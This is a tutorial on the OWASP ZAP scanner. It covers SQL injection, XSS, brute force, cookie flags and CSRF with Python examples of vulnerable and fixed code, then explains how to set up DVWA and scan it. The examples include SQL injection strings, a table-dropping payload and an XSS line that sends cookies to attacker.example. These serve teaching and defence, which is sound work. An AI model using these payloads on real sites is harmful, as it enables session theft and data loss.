OWASP ZAP (Zed Attack Proxy)
OWASP ZAP is a popular open-source web application security scanner that began as a flagship project of the Open Web Application Security Project (OWASP).
You can think of ZAP as a man-in-the-middle proxy with a scanner attached: it sits between your browser and the web application, records every request and response, and can then attack the application the way an attacker would, spidering its pages and sending attack payloads to each input it finds. It reports the vulnerabilities it triggers so you can fix them before the site goes live, which makes the site more secure and trustworthy. ZAP is widely used because of these vulnerability scanning capabilities.
Before we dive into how OWASP ZAP works, let's look at some common vulnerabilities it checks for, with real-world examples:
⚠️ Caution: Do not scan unknown or third-party websites without the owner's explicit consent. Since ZAP actively tests for vulnerabilities (similar to how attackers operate), using it without permission may result in legal consequences.
SQL Injection (SQLi)
What it is: SQL Injection happens when user input is pasted into the text of a SQL query, so an attacker can change the query's structure by sending quotes, comment markers or extra clauses instead of plain data. Depending on the query and the permissions of the database account, this lets them bypass a login, read other users' rows, change data, or delete entire tables.
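To make the mechanism concrete, here is an added example (not code from the page or from DVWA) showing the same login query written the vulnerable way and the safe way. The in-memory SQLite table, the usernames and the passwords are constructed for the example; the two payloads are the classic quote-and-comment tricks that ZAP's SQL injection checks also send.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the application's database.

    Passwords are stored in clear text only to keep the example short; a real
    system stores a salted hash (see the brute-force example further down)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Attacker-controlled strings are pasted straight into the SQL text, so a
    # quote in the input closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the query text is fixed and the values travel separately,
    # so whatever the user sends is only ever compared as data.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = build_db()
    # Payload 1: closes the password literal and appends an always-true clause:
    #   ... AND password = '' OR '1'='1'   (AND binds tighter, so every row matches)
    print(login_vulnerable(db, "admin", "' OR '1'='1"))   # True: login bypassed
    print(login_safe(db, "admin", "' OR '1'='1"))         # False
    # Payload 2: the username closes its literal and '--' comments out the password check.
    print(login_vulnerable(db, "admin'--", "anything"))   # True
    print(login_safe(db, "admin'--", "anything"))         # False
```

Stacked queries such as `'; DROP TABLE users;--` depend on the driver: Python's sqlite3 refuses to run two statements in one `execute()` call, while many other drivers and databases allow it, which is where the "delete the whole database" outcome comes from. Parameterised queries stop both classes of payload.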
Case Study: Heartland Payment Systems Data Breach
⚠️ Cross-Site Scripting (XSS)
What it is: A hacker injects malicious JavaScript code into a web page viewed by others. It runs in the victim's browser — not on the server.
Example: A seller on an e-commerce site adds a <script> tag to their product description. If the site inserts that text into the page without escaping it, the script runs in the browser of every buyer who views the listing, and can:
- Steal cookies or the login session
- Redirect the user to a fake login page
- Load malware from external sources
The script doesn't harm the server directly; it abuses the site's trust to attack its users.
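The product-description scenario above, as an added example that is not code from the page: a page template rendered once with the seller's text inserted raw and once with it HTML-escaped, plus a small parser that lists the script tags and event handlers a browser would execute in the result. The template, product name and the two payloads are constructed for the example.

```python
import html
from html.parser import HTMLParser

# Assumed page template for a product listing; the seller controls `description`.
PRODUCT_TEMPLATE = '<h1>{title}</h1>\n<div class="desc">{description}</div>'


def render_vulnerable(title: str, description: str) -> str:
    # Seller-supplied text is inserted into the page unchanged.
    return PRODUCT_TEMPLATE.format(title=title, description=description)


def render_safe(title: str, description: str) -> str:
    # Escape <, >, &, " and ' so the browser displays the text instead of parsing it.
    return PRODUCT_TEMPLATE.format(
        title=html.escape(title, quote=True),
        description=html.escape(description, quote=True),
    )


class ActiveContentFinder(HTMLParser):
    """Records <script> tags and on* event-handler attributes found in markup."""

    def __init__(self) -> None:
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script")
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"{tag}@{name.lower()}")


def active_content(markup: str) -> list:
    """Return the script tags / event handlers a browser would execute in `markup`."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


# Constructed payloads of the kind a malicious seller would submit.
COOKIE_THIEF = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
REDIRECTOR = '<img src=x onerror="location=\'https://attacker.example/login\'">'

if __name__ == "__main__":
    print(active_content(render_vulnerable("Phone", COOKIE_THIEF)))  # ['script']
    print(active_content(render_vulnerable("Phone", REDIRECTOR)))    # ['img@onerror']
    print(active_content(render_safe("Phone", COOKIE_THIEF)))        # []
    print(render_safe("Phone", COOKIE_THIEF))
```

Escaping has to match the context the text lands in: `html.escape` covers element bodies and quoted attributes, but text inserted into a JavaScript block, a URL or an unquoted attribute needs a different encoder, and a Content-Security-Policy that forbids inline scripts is the safety net for anything the encoder misses.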
Case Study: eBay XSS Breach
What is Brute Force?
A brute-force attack is an attacker repeatedly trying username/password combinations, usually with automated tools, until one of them works.
Examples:
- Trying common passwords such as admin, 123456 or password
- Credential stuffing: replaying username/password pairs from leaked credential lists, which works because many people reuse the same password across sites
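The defence against the attack just described, as an added example that is not code from the page: a login service that stores salted PBKDF2 hashes, hashes even for unknown usernames so response time does not leak which accounts exist, and locks an account after a fixed number of failures. The user, the wordlist and the lockout numbers are constructed for the example.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict

MAX_FAILURES = 5        # failed attempts allowed before the account is locked
LOCKOUT_SECONDS = 300   # how long the lock lasts
PBKDF2_ROUNDS = 100_000

# Dummy credentials hashed when the username does not exist, so the work done
# (and therefore the response time) is the same for valid and invalid users.
_DUMMY_SALT = b"\x00" * 16
_DUMMY_DIGEST = b"\x00" * 32


def hash_password(password: str, salt=None):
    """Return (salt, digest) using PBKDF2-HMAC-SHA256 with a per-user random salt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class LoginService:
    def __init__(self, clock=time.monotonic) -> None:
        self.users = {}                    # username -> (salt, digest)
        self.failures = defaultdict(int)   # username -> consecutive failures
        self.locked_until = {}             # username -> clock value when the lock ends
        self.clock = clock                 # injectable so lockout expiry can be tested

    def register(self, username: str, password: str) -> None:
        self.users[username] = hash_password(password)

    def attempt(self, username: str, password: str) -> str:
        """Return 'ok', 'denied' or 'locked'."""
        now = self.clock()
        if self.locked_until.get(username, 0.0) > now:
            return "locked"
        salt, digest = self.users.get(username, (_DUMMY_SALT, _DUMMY_DIGEST))
        _, candidate = hash_password(password, salt)
        # compare_digest runs in constant time, so the comparison itself leaks nothing.
        if username in self.users and hmac.compare_digest(candidate, digest):
            self.failures.pop(username, None)
            return "ok"
        self.failures[username] += 1
        if self.failures[username] >= MAX_FAILURES:
            self.locked_until[username] = now + LOCKOUT_SECONDS
            self.failures.pop(username, None)
        return "denied"


def simulate_wordlist_attack(service: LoginService, username: str, wordlist) -> list:
    """Try each candidate password in order and return the outcome of every attempt."""
    return [service.attempt(username, guess) for guess in wordlist]


# Constructed wordlist: the common passwords from the text, then the real one.
WORDLIST = ["admin", "123456", "password", "letmein", "qwerty", "Correct-Horse-9"]

if __name__ == "__main__":
    svc = LoginService()
    svc.register("admin", "Correct-Horse-9")
    print(simulate_wordlist_attack(svc, "admin", WORDLIST))
    # ['denied', 'denied', 'denied', 'denied', 'denied', 'locked']
```

Per-account lockout stops a dictionary attack on one user but not credential stuffing, which tries one leaked password per account and so never trips the counter; that needs per-source-IP rate limiting and a check of new passwords against breached-password lists. Lockout can also be turned into a denial of service against other users, which is why many sites prefer a growing delay over a hard lock.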
Case Study: GitHub Credential Stuffing Attack
How Cookies Work: Step-by-Step
- You visit a website for the first time and log in.
- The server sends a Set-Cookie header in its response:
Set-Cookie: sessionId=abc123; Path=/; HttpOnly; Secure
- Your browser stores the cookie.
- On every later request to that site, the browser sends it back automatically:
Cookie: sessionId=abc123
The server uses this value to look up your session, so you are not asked to log in again on every request. Cookies are also used for tracking and for personalising ads.
What Are Insecure Cookies?
Cookies are used to:
- Store session data (e.g., the logged-in state)
- Track user behaviour across pages
A cookie is insecure when it is:
- Not marked HttpOnly: JavaScript can read it through document.cookie, so an XSS payload can steal it
- Not marked Secure: the browser also sends it over unencrypted HTTP, where it can be sniffed on the network
- Not using SameSite (or set to SameSite=None): the browser attaches it to requests started by other sites, which is what CSRF attacks rely on
If an attacker steals your session cookie, they can impersonate you without ever knowing your password.
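The Set-Cookie header from the step-by-step section and the three flags from the list above, as an added example that is not code from the page: a small Set-Cookie parser and an audit that reports the same conditions ZAP's passive cookie checks raise. The sample headers are constructed; the first one mimics what a default PHP session (as used by DVWA) sends.

```python
# Constructed Set-Cookie headers, from a bare PHP session cookie to a hardened one.
SAMPLE_HEADERS = [
    "PHPSESSID=1a2b3c4d5e; path=/",
    "sid=abc123; Path=/; HttpOnly",
    "sessionId=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
    "tracker=xyz; Path=/; SameSite=None",
]


def parse_set_cookie(header: str):
    """Split a Set-Cookie value into (name, value, {attribute: value}).

    Attribute names are case-insensitive per RFC 6265, so they are lower-cased;
    flags such as HttpOnly and Secure end up with an empty string as value."""
    first, *rest = [part.strip() for part in header.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_cookie(header: str) -> list:
    """Return ZAP-style findings for one Set-Cookie header (empty list means fine)."""
    name, _value, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append(f"{name}: no HttpOnly flag (readable via document.cookie, stealable by XSS)")
    if "secure" not in attrs:
        findings.append(f"{name}: no Secure flag (also sent over unencrypted HTTP)")
    samesite = attrs.get("samesite", "").lower()
    if samesite not in ("lax", "strict"):
        findings.append(f"{name}: SameSite missing or None (sent on cross-site requests, enables CSRF)")
    if samesite == "none" and "secure" not in attrs:
        findings.append(f"{name}: SameSite=None without Secure is rejected by modern browsers")
    return findings


def audit_response(headers) -> dict:
    """Audit every Set-Cookie header of one response, keyed by cookie name."""
    return {parse_set_cookie(h)[0]: audit_cookie(h) for h in headers}


if __name__ == "__main__":
    for cookie, findings in audit_response(SAMPLE_HEADERS).items():
        print(cookie, "OK" if not findings else "")
        for line in findings:
            print("  -", line)
```

Browsers treat a cookie without SameSite as Lax by default these days, but the audit still flags it because the protection is then browser-dependent rather than something the application guarantees.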
Case Study: Yahoo Data Breach
What is CSRF? (Cross-Site Request Forgery)
CSRF is when an attacker tricks a logged-in user's browser into sending requests to a web app that the user never intended to make.
Example:
- You log in to your bank website.
- Your browser stores the session cookie.
- You open a malicious site in another tab.
- The malicious site sends a hidden request to your bank (e.g., an auto-submitting form that requests a money transfer).
- Your bank accepts it because the browser attached your valid session cookie.
- Money is transferred without your knowledge!
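The bank transfer scenario above with the standard defence added, as an added example that is not code from the page: the server embeds a session-bound anti-CSRF token in its own forms and rejects a POST that does not carry a valid one, with a check of the browser-supplied Origin header as a second layer. The session store, the secret key, the bank origin and the two requests are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Assumptions for the example: a server-side secret and an in-memory session store.
SECRET_KEY = secrets.token_bytes(32)
SESSIONS = {"abc123": {"user": "alice", "balance": 1000}}
BANK_ORIGIN = "https://bank.example"


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session: random nonce plus an HMAC over (session, nonce).

    The bank embeds this in its own transfer form; another origin cannot read it."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(request: dict) -> int:
    """POST /transfer handler over a minimal request dict; returns an HTTP status code."""
    session_id = request["cookies"].get("sessionId")
    if session_id not in SESSIONS:
        return 401
    # Layer 1: browsers attach an Origin header to cross-site POSTs, and a page
    # cannot forge it. If present it must be our own origin.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != BANK_ORIGIN:
        return 403
    # Layer 2: the form must carry a token that only our own pages could have embedded.
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", "")):
        return 403
    SESSIONS[session_id]["balance"] -= int(request["form"]["amount"])
    return 200


def legitimate_request() -> dict:
    """What the browser sends when the user submits the bank's own transfer form."""
    return {"cookies": {"sessionId": "abc123"},
            "headers": {"Origin": BANK_ORIGIN},
            "form": {"amount": "100", "to": "bob", "csrf_token": issue_csrf_token("abc123")}}


def forged_request() -> dict:
    """What the browser sends for evil.example's auto-submitting form: the bank
    cookie is attached automatically, but the page has no token and a foreign Origin."""
    return {"cookies": {"sessionId": "abc123"},
            "headers": {"Origin": "https://evil.example"},
            "form": {"amount": "1000", "to": "attacker"}}


if __name__ == "__main__":
    print(handle_transfer(forged_request()))      # 403, balance untouched
    print(handle_transfer(legitimate_request()))  # 200, balance now 900
    print(SESSIONS["abc123"]["balance"])
```

Marking the session cookie SameSite=Lax or Strict (see the insecure cookies section) stops the browser from attaching it to the forged POST in the first place; the token and Origin checks remain the server-side guarantee for browsers and requests where that attribute does not apply.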
ZAP INSTALLATION
Download OWASP ZAP for your operating system from the ZAP website. The desktop application needs a graphical environment, so on Linux use a distribution with a desktop installed (Kali Linux, which ships ZAP, is a convenient choice). ZAP can also run without a GUI, in daemon mode or from its official Docker image, which is how it is normally used in CI pipelines.
Let's Use DVWA (Damn Vulnerable Web Application) as Our Test Target
We'll deploy DVWA on an Ubuntu EC2 instance and run it in Docker. Follow these steps to get started:
Step 1: Install Docker on Your EC2 Instance
# Update your system and install prerequisites
sudo apt-get update
sudo apt-get install ca-certificates curl
# Create Docker GPG keyring directory
sudo install -m 0755 -d /etc/apt/keyrings
# Download and add Docker's GPG key
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# Add Docker repository
echo \
"deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
$(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
# Install Docker packages
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
Step 2: Run DVWA in Docker
The DVWA source code is on GitHub, and its README describes other installation methods.
# Pull the DVWA image and start it in the background, mapping host port 8080 to the container's port 80
sudo docker run -d -p 8080:80 vulnerables/web-dvwa
Step 3: Access DVWA in Your Browser
Open your browser and go to:
http://<AWS_EC2_PUBLIC_IP>:8080
Make sure to allow port 8080 in your AWS EC2 security group's inbound rules, and restrict that rule to your own IP address rather than 0.0.0.0/0: DVWA is deliberately vulnerable, so anyone who finds the instance can take it over.
Login Credentials:
- Username: admin
- Password: password
After logging in for the first time, open the Setup page (setup.php) and click Create / Reset Database so DVWA can create its tables.
⚙️ Use OWASP ZAP to Scan DVWA
- Open the OWASP ZAP application, select the Quick Start tab and choose Automated Scan.
- Enter the DVWA URL (http://<EC2_IP>:8080) in the URL to attack field.
- Click the Attack button. ZAP first spiders the site to discover its pages and forms, then runs an active scan that sends attack payloads to every parameter it found.
- When the scan finishes, the Alerts tab lists every finding grouped by risk (High, Medium, Low, Informational), with the affected URL, the parameter and the evidence that triggered it.
Note that an unauthenticated automated scan only reaches what an anonymous visitor can see, which for DVWA is mostly the login page. To exercise the vulnerable pages, browse DVWA while your browser is proxied through ZAP so that ZAP learns the session, and set the security level to Low on the DVWA Security page; at higher levels the injection checks are blocked by design.
✅ ZAP not only finds vulnerabilities but also explains each alert and suggests how to fix it, which makes it useful for developers as well as security testers.
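The same spider-then-active-scan sequence driven through ZAP's JSON API instead of the Quick Start tab, as an added example that is not code from the page or from the ZAP project. It assumes ZAP is running locally with its API enabled on the address and key given below (set under ZAP's API options), keeps the page's DVWA placeholder as the target, and finishes with a summary function that turns the alert list into per-risk counts and a pass/fail verdict, which is what a CI job needs. The sample alerts are constructed in the shape of ZAP's core/view/alerts response, with most fields trimmed.

```python
import json
import time
import urllib.parse
import urllib.request
from collections import Counter

ZAP_API = "http://127.0.0.1:8090"              # assumption: ZAP's local API address
ZAP_API_KEY = "changeme"                       # assumption: the key configured in ZAP
TARGET = "http://<AWS_EC2_PUBLIC_IP>:8080/"    # placeholder from the page

RISK_LEVELS = ("High", "Medium", "Low", "Informational")


def zap_call(path: str, **params) -> dict:
    """GET one ZAP JSON API endpoint, e.g. /JSON/spider/action/scan/, and parse the reply."""
    url = f"{ZAP_API}{path}?{urllib.parse.urlencode(params)}"
    req = urllib.request.Request(url, headers={"X-ZAP-API-Key": ZAP_API_KEY})
    with urllib.request.urlopen(req, timeout=60) as resp:
        return json.load(resp)


def wait_for_completion(status_path: str, scan_id: str, poll_seconds: float = 2.0) -> None:
    # The spider and the active scanner both expose a status view counting 0..100 percent.
    while int(zap_call(status_path, scanId=scan_id)["status"]) < 100:
        time.sleep(poll_seconds)


def run_scan(target: str) -> list:
    """What Quick Start's Automated Scan does: spider, active scan, then collect alerts."""
    spider_id = zap_call("/JSON/spider/action/scan/", url=target)["scan"]
    wait_for_completion("/JSON/spider/view/status/", spider_id)
    ascan_id = zap_call("/JSON/ascan/action/scan/", url=target)["scan"]
    wait_for_completion("/JSON/ascan/view/status/", ascan_id)
    return zap_call("/JSON/core/view/alerts/", baseurl=target)["alerts"]


def summarize_alerts(alerts: list, fail_at: str = "Medium") -> dict:
    """Count alerts per risk level and fail if anything at or above `fail_at` was found."""
    counts = Counter(alert["risk"] for alert in alerts)
    threshold = RISK_LEVELS.index(fail_at)
    failing = sum(counts[level] for level in RISK_LEVELS[: threshold + 1])
    by_type = Counter((alert["risk"], alert["alert"]) for alert in alerts)
    ordered = sorted(by_type.items(), key=lambda kv: (RISK_LEVELS.index(kv[0][0]), kv[0][1]))
    return {
        "counts": {level: counts[level] for level in RISK_LEVELS},
        "failed": failing > 0,
        "by_type": [(risk, name, n) for (risk, name), n in ordered],
    }


# Constructed alerts in the shape of core/view/alerts output (fields trimmed).
SAMPLE_ALERTS = [
    {"risk": "High", "alert": "SQL Injection", "url": TARGET + "vulnerabilities/sqli/", "param": "id"},
    {"risk": "Low", "alert": "Cookie No HttpOnly Flag", "url": TARGET, "param": "PHPSESSID"},
    {"risk": "Low", "alert": "Cookie No HttpOnly Flag", "url": TARGET + "login.php", "param": "PHPSESSID"},
    {"risk": "Medium", "alert": "Missing Anti-clickjacking Header", "url": TARGET, "param": "x-frame-options"},
    {"risk": "Informational", "alert": "User Agent Fuzzer", "url": TARGET, "param": "Header User-Agent"},
]

if __name__ == "__main__":
    # Replace SAMPLE_ALERTS with run_scan(TARGET) when a ZAP instance is reachable.
    summary = summarize_alerts(SAMPLE_ALERTS)
    print(summary["counts"], "FAILED" if summary["failed"] else "passed")
    for risk, name, n in summary["by_type"]:
        print(f"{risk:<14}{n:>3}  {name}")
```

The spider only follows links it can see, so for DVWA the scan should be started after logging in through ZAP's proxy, exactly as with the GUI; the API also exposes ZAP's context and authentication settings for fully unattended runs.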